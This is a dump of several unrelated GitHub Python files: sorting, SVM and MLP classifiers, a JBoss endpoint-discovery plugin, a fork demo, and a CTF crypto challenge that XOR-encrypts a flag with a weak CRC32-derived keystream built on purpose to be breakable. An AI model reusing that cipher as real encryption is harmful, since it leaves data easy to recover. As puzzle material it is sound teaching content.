clf.predict(X_train))\n# print(clf.predict(X_test), Y_test)\nf1 = f1_score(Y_test, clf.predict(X_test))\nprint('F1 score', f1)\n\ntest_predict_label = clf.decision_function(X_test)\nfpr, tpr, threshold = roc_curve(Y_test, test_predict_label)\n\n# print(fpr,tpr,threshold)\nroc_auc = auc(fpr, tpr)\n\nplt.figure()\nlw = 2\nplt.figure(figsize=(10, 10))\nplt.plot(fpr, tpr, color='darkorange',\n lw=lw, label='ROC curve (area = %0.2f)' % roc_auc) ###假正率为横坐标,真正率为纵坐标做曲线\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC curve')\nplt.legend(loc=\"lower 
right\")\nplt.show()\n\n\n","repo_name":"justarter/JCCX0001-Biomedical-Signal-Processing","sub_path":"SVM/sklearn_svm.py","file_name":"sklearn_svm.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2853080645","text":"def RadixSort(nums):\r\n \"\"\"use 10 as the base for radix\r\n so the length of int in decimal becomes the time of iteration\"\"\"\r\n max_digit = max(map(len, map(str, nums)))\r\n radix = 1\r\n for d in range(max_digit):\r\n counter = [0] * 10\r\n partial_sorted = [0] * len(nums)\r\n for i in range(len(nums)):\r\n counter[nums[i]%(radix*10)//radix] += 1\r\n for i in range(1, len(counter)):\r\n counter[i] += counter[i - 1]\r\n for i in range(len(nums) - 1, -1, -1):\r\n partial_sorted[counter[nums[i]%(radix*10)//radix] - 1] = nums[i] # index -1 because A and sorted_A starts from index 0\r\n counter[nums[i]%(radix*10)//radix] -= 1\r\n nums = partial_sorted\r\n radix *= 10\r\n return nums\r\n\r\n\r\nif __name__ == '__main__':\r\n import random\r\n length = 1000\r\n A = list(range(length))\r\n random.shuffle(A)\r\n print(A)\r\n check = list(range(length))\r\n A = RadixSort(A)\r\n print(A)\r\n print(A == check)\r\n","repo_name":"hiltonjiang/LeetCode","sub_path":"algorithm-and-data-structure/algorithm/排序/RadixSort.py","file_name":"RadixSort.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26633651691","text":"#coding=utf-8\nfrom plugins import Plugin\nfrom appilog.common.system.types.vectors import ObjectStateHolderVector\nfrom appilog.common.system.types import ObjectStateHolder\nfrom com.hp.ucmdb.discovery.library.communication.downloader.cfgfiles import GeneralSettingsConfigFile\n\nimport ip_addr\nimport entity\nimport re\nimport logger\nimport modeling\nimport file_system\nimport file_topology\nimport jee\nimport jboss_discoverer\nimport netutils\nfrom fptools import partiallyApply\nimport fptools\nfrom iteratortools import first, keep\nimport jee_discoverer\nfrom com.hp.ucmdb.discovery.library.clients import ClientsConsts\n\nclass JbossServerPlugin(Plugin):\n\n def isApplicable(self, context):\n mainProcesses = context.application.getMainProcesses()\n if not (mainProcesses and mainProcesses[0]):\n logger.warn(\"No JBoss process found\")\n return 0\n return 1\n\n\nclass Jboss3to6ServerPlugin(JbossServerPlugin):\n '''\n Purpose of plugin is reporing of server name and domain name by cmd-line\n '''\n def __init__(self):\n Plugin.__init__(self)\n\n def process(self, context):\n application = context.application\n osh = application.getOsh()\n process = application.getMainProcesses()[0]\n command_line = process.commandLine\n server_name = 'default'\n p = 'org\\.jboss\\.Main.*?\\s+-{1,2}(?:c\\s+|configuration\\s*=\\s*)([\\w_\\.-]+)'\n m = re.search(p, command_line)\n if m is not None:\n server_name = m.group(1)\n logger.debug('Found jboss ', server_name, ' configuration')\n else:\n logger.debug('Found jboss default configuration')\n osh.setAttribute('j2eeserver_servername', server_name)\n #TODO: replace to jee.ServerTopologyBuilder._composeFullName\n osh.setAttribute('j2eeserver_fullname', server_name)\n osh.setAttribute('name', server_name)\n modeling.setJ2eeServerAdminDomain(osh, server_name)\n modeling.setAppServerType(osh)\n\n if context.client.getClientType() != ClientsConsts.WMI_PROTOCOL_NAME:\n self.reportendPortByConfigfile(context)\n\n def 
reportendPortByConfigfile(self,context):\n logger.debug(\"reporting endpoints for jboss3-6 using configfile\")\n endpointOSHV = ObjectStateHolderVector()\n ip = context.application.getApplicationIp()\n shell = context.client\n fs = file_system.createFileSystem(shell)\n globalSettings = GeneralSettingsConfigFile.getInstance()\n loadExternalDTD = globalSettings.getPropertyBooleanValue('loadExternalDTD', 0)\n application = context.application\n osh = application.getOsh()\n process = application.getMainProcesses()[0]\n path = file_system.getPath(fs)\n ### JBoss server System Properties discovery:\n cmdLineElements = jee.JvmCommandLineDescriptor(process.commandLine).parseElements()\n serverSystemProperties = jboss_discoverer.SystemPropertiesDiscoverer().discoverProperties(fs, cmdLineElements)\n # JBoss HomeDir path discovery:\n jbossHomePath = jboss_discoverer.discoverHomeDirPath(fs, serverSystemProperties, cmdLineElements)\n if not jbossHomePath:\n logger.warn(\"Failed to report endpoints for jboss3-6 using configfile, because of the configfile cannot be found.\")\n return\n # JBoss version discovery:\n versionLayout = None\n try:\n versionLayout = jboss_discoverer.VersionLayout(fs, jbossHomePath)\n except:\n logger.debugException('Failed to create JBoss layout.')\n logger.reportWarning('Failed to create JBoss Layout. No endpoints from config file will be reported.')\n return\n versionInfoDiscoverer = jboss_discoverer.VersionInfoDiscovererByShell(shell, versionLayout)\n versionInfo = versionInfoDiscoverer.discoverVersion()\n platformTrait = jboss_discoverer.getPlatformTrait(versionInfo)\n # Setting JBoss bind address by default, if jboss.bind.address wasn't set:\n serverSystemProperties.setdefault('jboss.bind.address',\n (platformTrait.majorVersion.value() == 3\n and '0.0.0.0'\n or '127.0.0.1'))\n # resolve JBoss File Separator:\n serverSystemProperties['/'] = fs.FileSeparator\n # set corresponding properties to found values:\n serverSystemProperties['jboss.home.dir'] = jbossHomePath\n serverSystemProperties['jboss.home.url'] = ''.join((jbossHomePath,'/'))\n # resolve relative properties with custom or default values:\n if jbossHomePath:\n serverSystemProperties.setdefault('jboss.lib.url', path.join(jbossHomePath, 'lib'))\n serverSystemProperties.setdefault('jboss.server.base.dir', path.join(jbossHomePath, 'server'))\n serverSystemProperties.setdefault('jboss.server.base.url', ''.join((serverSystemProperties.get('jboss.home.url'), '/server/')))\n serverSystemProperties.setdefault('jboss.common.base.url', ''.join((serverSystemProperties.get('jboss.home.url'), '/common/')))\n serverSystemProperties.setdefault('jboss.common.lib.url', ''.join((serverSystemProperties.get('jboss.common.base.url'), '/lib/')))\n # Setting JBoss default server name, if jboss.server.name wasn't set:\n serverSystemProperties.setdefault('jboss.server.name',\n (platformTrait.majorVersion.value() == 4\n and platformTrait.isEAP()\n and 'production'\n or 'default'))\n # ServerHomeDir path discovery:\n serverHomePath = jboss_discoverer.discoverServerHomeDirPath(fs, serverSystemProperties.get('jboss.server.name'), jbossHomePath, serverSystemProperties)\n # set corresponding properties to found values:\n serverSystemProperties['jboss.server.home.dir'] = serverHomePath\n serverSystemProperties['jboss.server.url'] = ''.join((serverHomePath,'/'))\n serverSystemProperties['jboss.server.home.url'] = ''.join((serverHomePath,'/'))\n if serverHomePath:\n serverSystemProperties.setdefault('jboss.server.temp.dir', 
path.join(serverHomePath, 'tmp'))\n serverSystemProperties.setdefault('jboss.server.tmp.dir', path.join(serverHomePath, 'tmp'))\n serverSystemProperties.setdefault('jboss.server.data.dir', path.join(serverHomePath, 'data'))\n serverSystemProperties.setdefault('jboss.server.log.dir', path.join(serverHomePath, 'log'))\n serverSystemProperties.setdefault('jboss.server.config.url', ''.join((serverSystemProperties.get('jboss.server.home.url'), '/conf/')))\n serverSystemProperties.setdefault('jboss.server.lib.url', ''.join((serverSystemProperties.get('jboss.server.home.url'), '/lib/')))\n # Server ConfigDir discovery:\n serverConfigPath = jboss_discoverer.discoverServerConfigPath(fs, serverSystemProperties.get('jboss.server.config.url'), serverHomePath)\n logger.debug('Found server config path: %s' % serverConfigPath)\n\n ### Config files / resources dirs paths discovery:\n serverConfigParser = jboss_discoverer.createServerConfigParser(loadExternalDTD, platformTrait)\n configFilePath = None\n # For JBoss 3.x - 4.x path to Binding Configuration stored in main-config (jboss-service.xml): \n try:\n if platformTrait.majorVersion.value() in (3, 4):\n configFilePath = path.join(serverConfigPath, 'jboss-service.xml')\n configFile = fs.getFile(configFilePath, [file_topology.FileAttrs.CONTENT, file_topology.FileAttrs.PATH])\n # For 5.0, 5.0 EAP, 5.1, 5.1 EAP, 6.0, 6.1\n # there is some custom settings file can be defined in ${jboss.server.config.url}/bootstrap/profile.xml file:\n # - path to custom main config file\n # - path to bindings configuration\n # - list of JEE resources dirs\n elif platformTrait.majorVersion.value() in (5, 6):\n profileLayout = jboss_discoverer.ProfileLayout(fs, serverConfigPath)\n profileDiscoverer = jboss_discoverer.ProfileDiscoverer(shell, profileLayout, serverConfigParser)\n # parse settings from profile.xml and resolve expression in value:\n # find custom or get default path to jboss-service.xml\n configFilePath = serverSystemProperties.getFilePathFromURLValue(serverSystemProperties.resolveProperty(profileDiscoverer.discoverConfigFilePathName())) \\\n or path.join(serverConfigPath, 'jboss-service.xml')\n configFile = fs.getFile(configFilePath, [file_topology.FileAttrs.CONTENT, file_topology.FileAttrs.PATH])\n except:\n logger.debugException('Failed to get JBoss service config file. Plug-in aborted.')\n raise Exception('Failed to get JBoss service config file. 
Plug-in aborted.')\n ### Bootstrap files discovery:\n bootstrapLayout = jboss_discoverer.BootstrapLayout(fs, serverConfigPath)\n bootstrapParser = jboss_discoverer.BootstrapParser()\n bootstrapDiscoverer = jboss_discoverer.BootstrapDiscovererByShell(shell, bootstrapLayout, bootstrapParser)\n bootstrapConfigFiles = bootstrapDiscoverer.discoverBootstrapConfigFiles(serverSystemProperties)\n configFiles, resourcesDirs, farmDirs, bindingsDirs, bindingsConfigs = bootstrapDiscoverer.discoverServerConfigAndResources(bootstrapConfigFiles, serverSystemProperties)\n if not configFiles:\n configFiles.append(configFile)\n configFiles = filter(lambda x: x.content, configFiles)\n\n configFilesContents = map(lambda x: x.content, configFiles)\n\n if not resourcesDirs:\n for configContent in configFilesContents:\n resourcesDirsListWithExpressions = serverConfigParser.parseResourcesDirsList(configContent)\n resourcesDirsList = map(serverSystemProperties.getFilePathFromURLValue, map(serverSystemProperties.resolveProperty, resourcesDirsListWithExpressions))\n for pathValue in resourcesDirsList:\n absPath = path.isAbsolute(pathValue) and pathValue \\\n or path.join(serverSystemProperties.get('jboss.server.url'), pathValue)\n resourcesDirs.append(path.normalizePath(absPath))\n bindingsConfigsLayout = \\\n jboss_discoverer.BindingsConfigsLayout(fs, bindingsDirs)\n bindingsConfigsDiscoverer = \\\n jboss_discoverer.BindingsConfigsDiscovererByShell(shell,\n bindingsConfigsLayout,\n bootstrapParser)\n bindingsConfigs.extend(\n bindingsConfigsDiscoverer.discoverBindingsConfigFiles())\n if not bindingsConfigs:\n for configContent in configFilesContents:\n bindingConfigWithExpressions = serverConfigParser.parseBindingManagerConfigPath(configContent)\n bindingConfig = serverSystemProperties.getFilePathFromURLValue(serverSystemProperties.resolveProperty(bindingConfigWithExpressions))\n bindingsConfigs.append(bindingConfig)\n bindingConfig = bindingsConfigs[0] if bindingsConfigs else None\n\n ipAddressList = context.framework.getTriggerCIDataAsList('ip_address_list')\n endpoints = []\n bindingsWithExpressions = []\n # at first read port binding configuration directly from jboss-services.xml\n if not bindingConfig:\n if configFile.content:\n bindingsWithExpressions = serverConfigParser.parseBindingsFromJBossServiceXml(configFile.content)\n else: # in case of binding configuration separated in custom bindings file\n bidingConfigContent = fs.getFile(bindingConfig, [file_topology.FileAttrs.CONTENT]).content\n # JBoss version 3.x - 4.x doesn't support portOffset, create endpoints as is\n if platformTrait.majorVersion.value() in (3, 4):\n bindingManagerName = serverConfigParser.parseBindingManagerConfigName(configFile.content)\n bindingsWithExpressions = serverConfigParser.parseBindingsFromBindingManagerConfig(bidingConfigContent, bindingManagerName)\n # In JBoss version 5.x - 6.x except endpoints, there are offset and default host\n if platformTrait.majorVersion.value() in (5, 6):\n # get ports configuration\n activeMetadataSetName = serverConfigParser.parseActiveMetadataSetName(bidingConfigContent)\n metadataSetWithExpressions = serverConfigParser.parseMetadataSetConfiguration(bidingConfigContent, activeMetadataSetName)\n # get offset and defaultHost configuration\n activeBindingSetNameWithExpression = serverConfigParser.parseActiveBindingSetName(bidingConfigContent)\n activeBindingSetName = serverSystemProperties.resolveProperty(activeBindingSetNameWithExpression)\n portOffsetWithExpression, defaultHostWithExpression = 
serverConfigParser.parseBindingSetConfiguration(bidingConfigContent, activeBindingSetName)\n # resolve expressions in portOffset and defaultHost:\n portOffset = entity.Numeric(int)\n defaultHost = None\n try:\n portOffset.set(serverSystemProperties.resolveProperty(portOffsetWithExpression))\n defaultHost = serverSystemProperties.resolveProperty(defaultHostWithExpression)\n except Exception:\n logger.debug('Failed to get port-offset and defaultHost')\n # apply portOffset and set default host to bindings:\n for binding in metadataSetWithExpressions:\n portOrigValue = entity.Numeric(int)\n portWithOffset = entity.Numeric(int)\n try:\n portOrigValue.set(serverSystemProperties.resolveProperty(binding.getPort()))\n offset = portOffset.value() or 0\n portWithOffset.set(portOrigValue.value() + offset)\n host = binding.getHost() or defaultHost\n bindingsWithExpressions.append(jboss_discoverer.ServerSocketDescriptor(str(portWithOffset), host))\n except Exception:\n logger.debug('Failed to apply port offset or default host')\n\n # resolve system properties expressions in bindings:\n for binding in bindingsWithExpressions:\n try:\n portValue = serverSystemProperties.resolveProperty(binding.getPort())\n port = entity.Numeric(int)\n port.set(portValue)\n # in case of host doesn't defined jboss is using ${jboss.bind.address}\n host = serverSystemProperties.resolveProperty(binding.getHost() or '${jboss.bind.address}')\n host = (host == '127.0.0.1' and ip or host)\n hostAddresses = (host == '0.0.0.0' and ipAddressList\n or (host,))\n for address in hostAddresses:\n endpoint = netutils.createTcpEndpoint(address, port.value())\n endpoints.append(endpoint)\n logger.debug('the binding port is,',port.value())\n logger.debug('the address is:',address)\n\n endpoint = netutils.Endpoint(port.value(), netutils.ProtocolType.TCP_PROTOCOL, address)\n endpointOSH = modeling.createIpServerOSH(endpoint)\n hostosh = modeling.createHostOSH(ip)\n endpointOSH.setContainer(hostosh)\n linkOsh = modeling.createLinkOSH(\"usage\", context.application.getOsh(), endpointOSH)\n endpointOSHV.add(endpointOSH)\n endpointOSHV.add(linkOsh)\n logger.debug('Get ip using configfile:',ip)\n logger.debug('Get port using configfile:', port)\n except Exception:\n logger.debug('Failed to create server endpoint')\n if endpointOSHV:\n context.resultsVector.addAll(endpointOSHV)\n\n\nclass Jboss7StandaloneServerPlugin(JbossServerPlugin):\n '''\n Purpose of plugin is reporing of server name and domain name by config-file\n '''\n def __init__(self):\n Plugin.__init__(self)\n\n def process(self, context):\n application = context.application\n osh = application.getOsh()\n shell = context.client\n fs = file_system.createFileSystem(shell)\n ip = application.getConnectionIp()\n dns_resolver = jee_discoverer.DnsResolverDecorator(\n netutils.createDnsResolverByShell(shell), ip)\n process = application.getMainProcesses()[0]\n cmd_line = process.commandLine\n server_runtime = jboss_discoverer.createServerRuntime(cmd_line, ip)\n home_dir = server_runtime.findHomeDirPath()\n serverBaseDir = server_runtime.findServerBaseDirPath()\n serverConfigDir = server_runtime.findServerConfigDirPath()\n config = server_runtime.extractOptionValue('--server-config') or server_runtime.extractOptionValue('-c')\n layout = jboss_discoverer.StandaloneModeLayout(fs, home_dir, config, serverBaseDir, serverConfigDir)\n loadDtd = 0\n server_config_parser = jboss_discoverer.ServerConfigParserV7(loadDtd)\n standalone_config_path = layout.getStandaloneConfigPath() \n standalone_config_file 
= None\n try:\n standalone_config_file = layout.getFileContent(standalone_config_path) \n except:\n logger.debugException('Failed getting JBoss config file. No extra data will be reported')\n raise Exception('Failed getting JBoss config file. No extra data will be reported')\n content = standalone_config_file.content\n standalone_config_with_expressions = (\n server_config_parser.parseStandaloneServerConfig(content))\n server_properties = jboss_discoverer.SystemProperties()\n properties_from_cmd_line = server_runtime.findJbossProperties()\n server_properties.update(properties_from_cmd_line)\n config_props = standalone_config_with_expressions.getSystemProperties()\n server_properties.update(config_props)\n standalone_config = server_config_parser.resolveStandaloneServerConfig(\n standalone_config_with_expressions, server_properties)\n server_name = standalone_config.getServerName()\n if not server_name:\n if serverBaseDir is not None:\n path_util = file_system.getPath(fs)\n server_name = path_util.baseName(serverBaseDir)\n else:\n p = '-Djboss.node.name=([\\w_\\.-]+)\\s'\n jnn = re.search(p, cmd_line)\n p = '-Djboss.server.name=([\\w_\\.-]+)\\s'\n jsn = re.search(p, cmd_line)\n if jnn is not None:\n server_name = jnn.group(1)\n elif jsn is not None:\n server_name = jsn.group(1)\n else:\n try:\n server_name = dns_resolver.resolveHostnamesByIp(ip)[0]\n except netutils.ResolveException:\n server_name = 'Default'\n if server_name is not None:\n osh.setAttribute('j2eeserver_servername', server_name)\n #TODO: replace to jee.ServerTopologyBuilder._composeFullName\n osh.setAttribute('j2eeserver_fullname', server_name)\n osh.setAttribute('name', server_name)\n modeling.setJ2eeServerAdminDomain(osh, server_name)\n modeling.setAppServerType(osh)\n\n ##reportEndpointByConfigFile\n self.reportEndpointByConfigFile(context, shell, standalone_config)\n\n def reportEndpointByConfigFile(self,context, shell, standalone_config):\n logger.debug(\"reporting endpoints for jboss7 using configfile\")\n endpointOSHV = ObjectStateHolderVector()\n interfaces = standalone_config.getInterfaces()\n names = []\n addresses = []\n for interface in interfaces:\n names.append(interface.getName())\n addresses.append(interface.getInetAddress())\n interfaceDict = dict(zip(names,addresses))\n socketbindgroups = standalone_config.getSocketBindingGroup()\n socketbinds = socketbindgroups.getBindings()\n for socketbind in socketbinds:\n port = socketbind.getPort()\n host = interfaceDict.get(socketbind.getInterfaceName())\n ip = None\n if port:\n if not host or host == '*' or host == '127.0.0.1':\n if context.application.getApplicationIp():\n ip = context.application.getApplicationIp()\n elif netutils.isValidIp(host):\n ip = host\n else:\n ip = netutils.resolveIP(shell,host)\n if ip:\n endpoint = netutils.Endpoint(port, netutils.ProtocolType.TCP_PROTOCOL, ip)\n endpointOSH = modeling.createIpServerOSH(endpoint)\n hostosh = modeling.createHostOSH(ip)\n endpointOSH.setContainer(hostosh)\n linkOsh = modeling.createLinkOSH(\"usage\", context.application.getOsh(), endpointOSH)\n endpointOSHV.add(endpointOSH)\n endpointOSHV.add(linkOsh)\n logger.debug('Get ip using configfile standalone.xml:',ip)\n logger.debug('Get port using configfile standalone.xml:', port)\n if endpointOSHV:\n context.resultsVector.addAll(endpointOSHV)\n\n\nclass Jboss7ManagedServerPlugin(JbossServerPlugin):\n '''\n Purpose of plugin is reporing of server name and domain name by cmd-line\n '''\n def __init__(self):\n Plugin.__init__(self)\n\n def 
__parse_server_name_from_server_option(self, element):\n '''\n Parse server name from -D[Server:] param\n @types: jee.CmdLineElement -> str?\n '''\n element_name = element.getName()\n if element_name.startswith('[Server:') != 0:\n logger.debug('Found by server param: %s' % element_name[8:-1])\n return element_name[8:-1]\n\n def __parse_server_name_from_log_file_path(self, element, path_util):\n '''\n Parse server name from log-file param\n @types: jee.CmdLineElement, file_topology.Path -> str?\n '''\n element_name = element.getName()\n if element_name == 'org.jboss.boot.log.file':\n log_file_path = element.getValue()\n if path_util.isAbsolute(log_file_path):\n log_dir = path_util.dirName(log_file_path)\n server_dir = path_util.dirName(log_dir)\n logger.debug('Found by log-file %s' % path_util.baseName(server_dir))\n return path_util.baseName(server_dir)\n\n def parse_server_name(self, element, path_util):\n return (self.__parse_server_name_from_server_option(element) or\n self.__parse_server_name_from_log_file_path(element, path_util))\n\n def __is_java_option(self, element):\n return element.getType() == jee.CmdLineElement.Type.JAVA_OPTION\n\n def process(self, context):\n shell = context.client\n fs = file_system.createFileSystem(shell)\n path_util = file_system.getPath(fs)\n application = context.application\n osh = application.getOsh()\n process = application.getMainProcesses()[0]\n cmd_line = process.commandLine\n jvm_cmd_line_descriptor = jee.JvmCommandLineDescriptor(cmd_line)\n cmd_line_elements = jvm_cmd_line_descriptor.parseElements()\n java_options = filter(self.__is_java_option, cmd_line_elements)\n parse_fn = partiallyApply(self.parse_server_name, fptools._, path_util)\n server_name = first(keep(parse_fn, java_options))\n logger.debug('server name: %s' % server_name)\n if server_name is not None:\n osh.setAttribute('j2eeserver_servername', server_name)\n #TODO: replace to jee.ServerTopologyBuilder._composeFullName\n osh.setAttribute('j2eeserver_fullname', server_name)\n modeling.setAppServerType(osh)\n\n self.reportEndpointByConfigFile(context, application, cmd_line, fs)\n\n def reportEndpointByConfigFile(self,context, application, cmd_line, fs):\n logger.debug(\"reporting endpoints for jboss7 ManagedServer configfile\")\n endpointOSHV = ObjectStateHolderVector()\n ip = application.getConnectionIp()\n server_runtime = jboss_discoverer.createServerRuntime(cmd_line, ip)\n home_dir = server_runtime.findHomeDirPath()\n config = server_runtime.extractOptionValue('--server-config')\n layout = jboss_discoverer.DomainModeLayout(fs, home_dir, config)\n loadDtd = 0\n server_config_parser = jboss_discoverer.ServerConfigParserV7(loadDtd)\n host_ConfigPath = layout.getHostConfigPath()\n host_ConfigPath_file = layout.getFileContent(host_ConfigPath)\n host_ControllerConfigWithExpressions = server_config_parser.parseHostControllerConfig(host_ConfigPath_file.content)\n # Host-Controller System Properties propagated from Domain System Properties and can be defined at host-controller config\n host_ControllerProperties = jboss_discoverer.SystemProperties()\n # update system properties from host-controller config-file:\n host_ControllerProperties.update(host_ControllerConfigWithExpressions.getSystemProperties())\n # now we are ready to resolve host-controller config-expressions to values\n host_ControllerConfig = server_config_parser.resolveHostControllerConfig(host_ControllerConfigWithExpressions, host_ControllerProperties)\n managementBindings = host_ControllerConfig.getManagementBindings()\n for 
managementBinding in managementBindings:\n port = managementBinding.getPort()\n if port:\n if context.application.getApplicationIp():\n ip = context.application.getApplicationIp()\n endpoint = netutils.Endpoint(port, netutils.ProtocolType.TCP_PROTOCOL, ip)\n endpointOSH = modeling.createIpServerOSH(endpoint)\n hostosh = modeling.createHostOSH(ip)\n endpointOSH.setContainer(hostosh)\n linkOsh = modeling.createLinkOSH(\"usage\", context.application.getOsh(), endpointOSH)\n endpointOSHV.add(endpointOSH)\n endpointOSHV.add(linkOsh)\n logger.debug('Get ip using configfile domain.xml:',ip)\n logger.debug('Get port using configfile domain.xml:', port)\n if endpointOSHV:\n context.resultsVector.addAll(endpointOSHV)\n","repo_name":"chundcm/cda-record","sub_path":"reference/ucmdb/discovery/plugins_jboss_server_domain.py","file_name":"plugins_jboss_server_domain.py","file_ext":"py","file_size_in_byte":27005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5096745086","text":"#!/usr/bin/env python\nimport sys\n\n\nclass Point:\n def __init__(self, *points: int):\n self.points = points\n\n def distance(self, other):\n diff = ((a-b)**2 for a, b in zip(self.points, other.points))\n return sum(diff)**0.5\n\n def __repr__(self):\n return f'Point{self.points}'\n\n def __str__(self):\n return f'Point{self.points}'\n\n\ndef read(arg):\n points = []\n with open(arg, 'r') as data:\n for i in data:\n point = tuple(int(a) for a in i.strip().split(','))\n points.append(point)\n return points\n\n\ndef total_perim(data):\n side = []\n a = [Point(*d) for d in data]\n total = 0\n i = 0\n to_index = len(a)-1\n while i < to_index:\n perimeter = a[i].distance(a[i+1])\n side.append(perimeter)\n total += perimeter\n i += 1\n last = a[0].distance(a[-1])\n total += last\n side.append(last)\n return round(total, 2), side\n\n\ndef outcome(data):\n val = total_perim(data)\n print(f'Sides: {val[1]}'\n f'\\nTotal perimeter: {val[0]}'\n f'\\nMaximum length: {round(max(val[1]), 2)}'\n\t\t f'\\nMinimum length: {round(min(val[1]), 2)}'\n f'\\nAverage length: {round(val[0]/len(val[1]), 2)}')\n\n\nif __name__ == '__main__':\n argument = sys.argv[1:]\n dt = (read(arg) for arg in argument)\n for mover, i in enumerate(dt):\n print(\"-\"*10, argument[mover], \"*\"*10) # Displaying the name of the file\n print('Points:', i)\n outcome(i)\n print(end='\\n')\n","repo_name":"comsavvy/Perimeter","sub_path":"perimeter.py","file_name":"perimeter.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18582745353","text":"import os\nimport subprocess as sp\n\npid = os.fork()\nif pid == 0:\n try:\n print(\"I'm child with ID:\", os.getpid())\n print(\"My parent's ID:\", os.getppid())\n p = sp.run([\"python\", \"testchild.py\"]) # Does not hang\n finally:\n os._exit(0) # Be sure to exit child process if running in interactive interpreter\nelse:\n os.waitpid(pid, 0) # This will ensure parent print statements are always last\n print(\"I'm parent with ID:\", os.getpid())\n print(\"My child's ID:\", pid)\n","repo_name":"mrclary/spyder-dev","sub_path":"issue-20629/mwe_1_works.py","file_name":"mwe_1_works.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38237897362","text":"import os\nimport zlib\ndef keystream():\n\tkey = os.urandom(2)\n\tindex = 0\n\twhile 1:\n\t\tindex+=1\n\t\tif index >= 
len(key):\n\t\t\tkey += zlib.crc32(key).to_bytes(4,'big')\n\t\tyield key[index]\nciphertext = []\nwith open(\"plain\",\"rb\") as f:\n\tplain = f.read()\n\tassert b\"actf{\" in plain\n\tk = keystream()\n\tfor i in plain:\n\t\tciphertext.append(i ^ next(k))\nwith open(\"enc\",\"wb\") as g:\n\tg.write(bytes(ciphertext))","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/angstrom/2021/crypto/Follow_the_Currents/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"25237686885","text":"import os\nimport pickle\nfrom time import time\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, classification_report, \\\n ConfusionMatrixDisplay, PrecisionRecallDisplay, \\\n RocCurveDisplay, roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.neural_network import MLPClassifier\n\nfrom feature_models import feature_model_A_1, feature_model_D_1\nimport parameters as p\n\ndata_directory = p.DATA_DIRECTORY\nparameter_data_directory = \\\n os.path.join(p.PARAMETER_DATA_DIRECTORY, 'Basic Multilayer Perceptron')\nperformance_data_directory = \\\n os.path.join(p.PERFORMANCE_DATA_DIRECTORY, 'Basic Multilayer Perceptron')\nclassifier_directory = \\\n os.path.join(p.CLASSIFIER_DIRECTORY, 'basic_multilayer_perceptron')\n\n\ndef main():\n # start_time = pd.Timestamp.now()\n # print(f\"Started Parameter Grid Search at {start_time}...\")\n # parameter_search(features, targets)\n # run_time = (pd.Timestamp.now() - start_time).total_seconds() / 60.0\n # print(f\"Grid Search Completed in {run_time:.2f} minutes.\\n\")\n\n # features, targets = \\\n # feature_model_A_1.get_data(data_directory)\n # start_time = pd.Timestamp.now()\n # print(f\"Started Random Forest Classification at {start_time}...\")\n # multilayer_perceptron_classification(\n # features, targets,\n # 'basic_multi_layer_perceptron_fm_A_1',\n # 'Basic Multi-Layer Perceptron Classification, Feature Model A_1'\n # )\n # run_time = (pd.Timestamp.now() - start_time).total_seconds() / 60.0\n # print(f\"Training Completed in {run_time:.2f} minutes.\\n\")\n\n features, targets = \\\n feature_model_D_1.get_data(data_directory)\n start_time = pd.Timestamp.now()\n print(f\"Started Random Forest Classification at {start_time}...\")\n multilayer_perceptron_classification(\n features, targets,\n 'basic_multi_layer_perceptron_fm_D_1',\n 'Basic Multi-Layer Perceptron Classification, Feature Model D_1'\n )\n run_time = (pd.Timestamp.now() - start_time).total_seconds() / 60.0\n print(f\"Training Completed in {run_time:.2f} minutes.\\n\")\n\n\ndef multilayer_perceptron_classification(features: np.ndarray,\n targets: np.ndarray,\n filename: str,\n filename_pretty: str):\n \"\"\"\n A basic, out of the box MLP classifier, using parameters\n optimized by a grid search algorithm.\n :param features:\n :param targets:\n :param filename:\n :param filename_pretty:\n :return:\n \"\"\"\n print(\"Loading Data...\")\n X_train, X_test, y_train, y_test = \\\n train_test_split(features, targets, test_size=20_000)\n clf = MLPClassifier(\n verbose=1, solver='adam',\n learning_rate='adaptive', max_iter=2000,\n n_iter_no_change=20, hidden_layer_sizes=(200, 200, 200)\n )\n print(\"Data loaded.\\n\")\n\n print(\"Fitting training data...\")\n clf.fit(X_train, y_train)\n print(\"Fitting complete.\\n\")\n\n 
\"Generating performance data...\"\n predictions = clf.predict(X_test)\n cm = confusion_matrix(y_test, predictions, labels=[1, 0])\n print(\"\\nConfusion Matrix:\")\n print(cm)\n print(\"\\nClassification Report:\")\n print(classification_report(y_test, predictions, labels=[1, 0]))\n print(\"\\nArea Under ROC Curve:\")\n print(1 - roc_auc_score(y_test, clf.predict_proba(X_test)[:, 0]))\n\n print(\"\\nSaving classifier...\")\n destination = os.path.join(\n classifier_directory, filename\n )\n with open(destination, 'wb') as file:\n pickle.dump(clf, file)\n print(f\"Classifier saved to {destination}\\n\")\n\n print(\"Generating precision recall figure...\")\n display = PrecisionRecallDisplay.from_estimator(\n clf, X_test, y_test, pos_label=1\n )\n display.plot()\n destination = os.path.join(\n performance_data_directory,\n filename_pretty + ' Precision Recall Curve.png'\n )\n display.figure_.savefig(destination)\n print(f\"Figure saved to {destination}\\n\")\n\n print(\"Generating ROC curve figure...\")\n display = RocCurveDisplay.from_estimator(\n clf, X_test, y_test, pos_label=1\n )\n display.plot()\n plt.show()\n destination = os.path.join(\n performance_data_directory,\n performance_data_directory, filename_pretty + ' ROC Curve.png'\n )\n display.figure_.savefig(destination)\n print(f\"Figure saved to 